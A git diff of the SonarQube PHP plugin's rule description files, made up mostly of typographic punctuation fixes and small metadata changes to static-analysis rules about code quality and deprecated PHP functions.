Merging collapsible if statements increases the code's readability.
Merging collapsible if statements increases the code’s readability.
if (condition1) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
index 71a2a57ce6..891574fa06 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
@@ -1,6 +1,6 @@
The complexity of an expression is defined by the number of &&, || and condition ? ifTrue : ifFalse
operators it contains.
-A single expression's complexity should not become too high to keep the code readable.
+A single expression’s complexity should not become too high to keep the code readable.
Noncompliant Code Example
With the default threshold value of 3
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
index 638640771d..1e2d730c75 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
@@ -1,9 +1,9 @@
Hard coding a URI makes it difficult to test a program: path literals are not always portable across operating systems, a given absolute path may
not exist on a specific test environment, a specified Internet URL may not be available when executing the tests, production environment filesystems
-usually differ from the development environment, ...etc. For all those reasons, a URI should never be hard coded. Instead, it should be replaced by
+usually differ from the development environment, …etc. For all those reasons, a URI should never be hard coded. Instead, it should be replaced by
customizable parameter.
Further even if the elements of a URI are obtained dynamically, portability can still be limited if the path-delimiters are hard-coded.
-This rule raises an issue when URI's or path delimiters are hard coded.
+This rule raises an issue when URI’s or path delimiters are hard coded.
See
Inheritance is certainly one of the most valuable concepts in object-oriented programming. It's a way to compartmentalize and reuse code by +
Inheritance is certainly one of the most valuable concepts in object-oriented programming. It’s a way to compartmentalize and reuse code by creating collections of attributes and behaviors called classes which can be based on previously created classes. But abusing this concept by creating a deep inheritance tree can lead to very complex and unmaintainable source code. Most of the time a too deep inheritance tree is due to bad object oriented design which has led to systematically use 'inheritance' when for instance 'composition' would suit better.
-This rule raises an issue when the inheritance tree, starting from Object has a greater depth than is allowed.
This rule raises an issue when the inheritance tree, starting from Object has a greater depth than is allowed.
When blocks are inlined (left and right curly braces on the same line), no issue is triggered.
+When blocks are inlined (left and right curly braces on the same line), no issue is triggered.
if(condition) {doSomething();}
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
index 3c4039f9bb..95698c23d4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
@@ -12,7 +12,7 @@ When blocks are inlined (open and close curly braces on the same line), no issue is triggered.
+When blocks are inlined (open and close curly braces on the same line), no issue is triggered.
if(condition) {doSomething();}
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
index 2e10cf7e7f..b927fe0349 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
@@ -1,5 +1,5 @@
The use of parentheses, even those not required to enforce a desired order of operations, can clarify the intent behind a piece of code. But -redundant pairs of parentheses could be misleading, and should be removed.
+redundant pairs of parentheses could be misleading, and should be removed.$x = ($y / 2 + 1); // Compliant even if the parenthesis are ignored by the compiler diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html index a2d462dc21..0beb73d463 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html @@ -1,5 +1,5 @@Overriding or shadowing a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of -code. Further, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.
+code. Further, it could lead maintainers to introduce bugs because they think they’re using one variable but are really using another.Noncompliant Code Example
class Foo { diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html index 7b5071d9f3..c0e2d68b67 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html @@ -11,7 +11,7 @@-Compliant Solution
if ($val && check()) { }or
+or
if ($val == value() && check()) { // Perhaps in fact the equality operator was expected } diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html index 642072f955..c69359385a 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html @@ -1,7 +1,7 @@Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same file.
If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the -opportunity to do so.
+opportunity to do so.Exceptions
Lines containing only whitespaces.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json index ad51186f5a..ebf8149c01 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json @@ -2,6 +2,10 @@ "title": "Track uses of \"FIXME\" tags", "type": "CODE_SMELL", "status": "ready", + "remediation": { + "func": "Constant\/Issue", + "constantCost": "0min" + }, "tags": [ "cwe" ], diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json index b1a76c6603..651fb0d171 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json @@ -2,6 +2,10 @@ "title": "Track uses of \"TODO\" tags", "type": "CODE_SMELL", "status": "ready", + "remediation": { + "func": "Constant\/Issue", + "constantCost": "0min" + }, "tags": [ "cwe" ], diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html index 9a98800d9d..d746c59785 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html @@ -1,4 +1,4 @@ -Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a +
Having too many return statements in a function increases the function’s essential complexity because the flow of execution is broken each time a return statement is encountered. This makes it harder to read and understand the logic of the function.
Noncompliant Code Example
With the default threshold of 3:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html index 20ae33264a..c16a874146 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html @@ -1,6 +1,6 @@-
ifstatements with conditions that are always false have the effect of making blocks of code non-functional.ifstatements with conditions that are always true are completely redundant, and make the code less readable.There are three possible causes for the presence of such code:
+There are three possible causes for the presence of such code:
When only the condition expression is defined in a for loop, and the initialization and increment expressions are missing, a
-while loop should be used instead to increase readability.
while loop should be used instead to increase readability.
for (;condition;) { /*...*/ }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
index 1d7b274336..5d278c4b05 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
@@ -1,5 +1,5 @@
A for loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and
-ending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins.
+ending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins.
Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the
introduction of errors in the future.
This rule tracks three types of non-invariant stop conditions:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html
index a262881045..541a225e1b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html
@@ -1,5 +1,5 @@
When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While
-this is sometimes intentional, it often is a mistake which leads to unexpected behavior.
+this is sometimes intentional, it often is a mistake which leads to unexpected behavior.
Noncompliant Code Example
switch ($myVariable) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
index 6249c555d8..a0aa015be3 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
@@ -1,6 +1,6 @@
The requirement for a final case default clause is defensive programming. The clause should either take appropriate action, or contain
a suitable comment as to why no action is taken. Even when the switch covers all current values of an enum, a default case
-should still be used because there is no guarantee that the enum won't be extended.
+should still be used because there is no guarantee that the enum won’t be extended.
Noncompliant Code Example
switch ($param) { //missing default clause
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
index a3948e2eff..d83e986e1a 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
@@ -8,9 +8,7 @@
"linearOffset": "10min",
"linearFactor": "1min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1311",
"sqKey": "S1311",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
index 380ff21c3d..e7a7d771ba 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
@@ -3,7 +3,7 @@
Today's services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always +
Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:
Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which -will increase an attack's impact.
+will increase an attack’s impact.The disclosed IP address is sensitive, e.g.:
There is a risk if you answered yes to any of these questions.
Don't hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar +
Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.
Nested if, for, while, switch, and try statements are key ingredients for making
-what's known as "Spaghetti code".
Such code is hard to read, refactor and therefore maintain.
With the default threshold of 3:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html index ec399fd828..aba68ac525 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html @@ -1,5 +1,5 @@A function that grows too large tends to aggregate too many responsibilities.
-Such functions inevitably become harder to understand and therefore harder to maintain.
+Such functions inevitably become harder to understand and therefore harder to maintain.
Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.
Those smaller functions will not only be easier to understand, but also probably easier to test.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html index 8d4f08d277..d490cb4dff 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html @@ -1,4 +1,4 @@ -Each source file should start with a header stating file ownership and the license which must be used to distribute the application.
+Each source file should start with a header stating file ownership and the license which must be used to distribute the application.
This rule must be fed with the header text that is expected at the beginning of every file.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json
index cf5755a9e7..9f44cff97e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-1451",
"sqKey": "S1451",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html
index 493f835f3a..ff231e0ef0 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html
@@ -6,13 +6,13 @@
Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific
meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS
-attack) and have a huge impact on an application's security.
+attack) and have a huge impact on an application’s security.
This rule marks for review each occurrence of the eval function. This
rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide
security code reviews.
Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html index 3ebcae95e7..e3ed0ac76d 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html @@ -1,5 +1,5 @@Shared coding conventions allow teams to collaborate effectively. For that reason, file names should conform to a defined standard. This rule -raises an issue when the names of analyzed files don't match the provided regular expression.
+raises an issue when the names of analyzed files don’t match the provided regular expression.PHP's "variable variables" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code.
+PHP’s "variable variables" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code.
$var = 'foo'; diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html index e52fd04f1a..be7cfef1a4 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html @@ -1,41 +1,47 @@The following predefined variables are deprecated and should be replaced by the new versions:
| Replace | With | ||
|---|---|---|---|
| $HTTP_SERVER_VARS | -$_SERVER | +$HTTP_SERVER_VARS |
+ $_SERVER |
| $HTTP_GET_VARS | -$_GET | +$HTTP_GET_VARS |
+ $_GET |
| $HTTP_POST_VARS | -$_POST | +$HTTP_POST_VARS |
+ $_POST |
| $HTTP_POST_FILES | -$_FILES | +$HTTP_POST_FILES |
+ $_FILES |
| $HTTP_SESSION_VARS | -$_SESSION | +$HTTP_SESSION_VARS |
+ $_SESSION |
| $HTTP_ENV_VARS | -$_ENV | +$HTTP_ENV_VARS |
+ $_ENV |
| $HTTP_COOKIE_VARS | -$_COOKIE | +$HTTP_COOKIE_VARS |
+ $_COOKIE |
| $php_errormsg | -error_get_last() | +$php_errormsg |
+ error_get_last() |
In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and
the __construct method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named
-__construct as the class constructor.
__construct as the class constructor.
This rule rule raises an issue for each method with the same name as the enclosing class.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json
index 66b1c82c8f..0cd4688fb1 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "3min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1656",
"sqKey": "S1656",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json
index 8a3cc299f2..d02dd2969b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "2min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1697",
"sqKey": "S1697",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json
index 501baab21a..b3dc00ddd7 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1751",
"sqKey": "S1751",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json
index eb962e0e7b..df685112dc 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json
@@ -1,5 +1,5 @@
{
- "title": "\"Some statements (return, break, continue, goto, switch) and throw
expressions move control flow out of the current code block. So any unlabeled statements that come after such a jump are unreachable, and either this
-dead code should be removed, or the logic should be corrected.
+dead code should be removed, or the logic should be corrected.
Noncompliant Code Example
function fun($a) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json
index 1edf95e6ca..7895a3a99e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "2min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1764",
"sqKey": "S1764",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html
index d0a6da49f2..22827bf854 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html
@@ -1,5 +1,5 @@
-The PHP 4 method of declaring a variable, using the var keyword, was deprecated in early versions of PHP 5. Even though it's not
-considered deprecated in the most recent versions, it's nonetheless not best practice to use it. When var does appear, it is interpreted
+
The PHP 4 method of declaring a variable, using the var keyword, was deprecated in early versions of PHP 5. Even though it’s not
+considered deprecated in the most recent versions, it’s nonetheless not best practice to use it. When var does appear, it is interpreted
as a synonym for public and treated as such. Therefore public should be used instead.
From the PHP Manual:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json
index 98fae1405a..5e4c13f9f8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json
@@ -1,5 +1,5 @@
{
- "title": "Closing tag \"?>\" should be omitted on files containing only PHP",
+ "title": "Closing tag \"?\u003e\" should be omitted on files containing only PHP",
"type": "CODE_SMELL",
"status": "ready",
"remediation": {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html
index dc622f6e75..91163cb7d6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html
@@ -1,5 +1,5 @@
The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many
-or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.
+or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.
But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it
impossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to "get to" the non-default arguments.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html
index 3179c91a74..13cf8cacbf 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html
@@ -1,5 +1,5 @@
The exit(...) and die(...) statements should absolutely not be used in Web PHP pages as this might lead to a very bad
-user experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error.
+user experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error.
But of course PHP can also be used to develop command line application and in such case use of exit(...) or die(...)
statement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those
exceptions should be caught just before leaving the application to specify the exit code with help of exit(...) or die(...)
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
index d4e4e9c2e8..d0d05860b0 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "20min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-1799",
"sqKey": "S1799",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
index 3fc53c86d5..61f71f00dd 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1848",
"sqKey": "S1848",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
index 2917b7245e..d58486d256 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
@@ -1,5 +1,5 @@
A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value
-only to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources.
+only to then overwrite it or throw it away, could indicate a serious error in the code. Even if it’s not an error, it is at best a waste of resources.
Therefore all calculated values should be used.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html
index 6978905b5f..9e7de4091c 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html
@@ -1,9 +1,9 @@
A switch and a chain of if/else if statements is evaluated from top to bottom. At most, only one branch will
be executed: the first one with a condition that evaluates to true.
-Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, it's simply dead code and
-at worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.
+Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, it’s simply dead code and
+at worst, it’s a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.
For a switch, if the first case ends with a break, the second case will never be executed, rendering it dead code. Worse
-there is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.
+there is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that’s actually used.
On the other hand, if the first case does not end with a break, both cases will be executed, but future maintainers may not notice
that.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html
index c447b64159..f741cb7785 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html
@@ -1,6 +1,6 @@
Having two cases in a switch statement or two branches in an if chain with the same implementation is at
best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an if chain they should
-be combined, or for a switch, one should fall through to the other.
+be combined, or for a switch, one should fall through to the other.
Noncompliant Code Example
switch ($i) {
@@ -47,7 +47,7 @@ Exceptions
But this exception does not apply to if chains without else-s, or to switch-es without default clauses when
all branches have the same single line of code. In case of if chains with else-s, or of switch-es with default
-clauses, rule {rule:php:S3923} raises a bug.
+clauses, rule {rule:php:S3923} raises a bug.
if ($a >= 0 && $a < 10) {
doTheThing();
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html
index 5d4d4348fa..0c7488c854 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html
@@ -1,11 +1,11 @@
Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as
well, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,
particularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than
-more efficient.
-Further, according to the PHP manual:
+more efficient.
+Further, according to the PHP manual:
- As of PHP 5.3.0, you will get a warning saying that "call-time pass-by-reference" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference
- was removed, so using it will raise a fatal error.
+ As of PHP 5.3.0, you will get a warning saying that "call-time pass-by-reference" is deprecated… And as of PHP 5.4.0, call-time
+ pass-by-reference was removed, so using it will raise a fatal error.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json
index b5a5755279..51f64a92e2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json
@@ -1,5 +1,5 @@
{
- "title": "Files should not contain characters before \"
The following functions were deprecated in PHP 5:
-
+
+
+
Deprecated
Use Instead
+
+
- call_user_method()call_user_func()call_user_method()
call_user_func()
- call_user_method_array()call_user_func_array()call_user_method_array()
call_user_func_array()
- define_syslog_variables()define_syslog_variables()
- dl()dl()
- ereg()preg_match()ereg()
preg_match()
- ereg_replace()preg_replace() (note that this is deprecated in PHP 5.5)ereg_replace()
preg_replace() (note that this is deprecated in PHP 5.5)
- eregi()preg_match() with 'i' modifiereregi()
preg_match() with 'i' modifier
- eregi_replace()preg_replace() with 'i' modifiereregi_replace()
preg_replace() with 'i' modifier
- set_magic_quotes_runtime() and its alias, magic_quotes_runtime()set_magic_quotes_runtime() and its alias, magic_quotes_runtime()
- session_register()$_SESSION superglobalsession_register()
$_SESSION superglobal
- session_unregister()$_SESSION superglobalsession_unregister()
$_SESSION superglobal
- session_is_registered()$_SESSION superglobalsession_is_registered()
$_SESSION superglobal
- set_socket_blocking()stream_set_blocking()set_socket_blocking()
stream_set_blocking()
- split()preg_split()split()
preg_split()
- spliti()preg_split() with 'i' modifierspliti()
preg_split() with 'i' modifier
- sql_regcase()sql_regcase()
- mysql_db_query()mysql_select_db() and mysql_query()mysql_db_query()
mysql_select_db() and mysql_query()
- mysql_escape_string()mysql_real_escape_string()mysql_escape_string()
mysql_real_escape_string()
- Passing locale category names as strings
- Use the LC_* family of constants
+ Passing locale category names as strings
Use the LC_* family of constants
The following functions were deprecated in PHP 7:
-
+
+
+
Deprecated
Use Instead
+
+
- __autoload()spl_autoload_register()__autoload()
spl_autoload_register()
- create_function()anonymous function
+ create_function()
anonymous function
- parse_str() without second argumentparse_str() with second argumentparse_str() without second argument
parse_str() with second argument
- gmp_random()gmp_random_bits() or gmp_random_range()gmp_random()
gmp_random_bits() or gmp_random_range()
- each()foreacheach()
foreach
- assert() with string argument
+ assert() with string argument
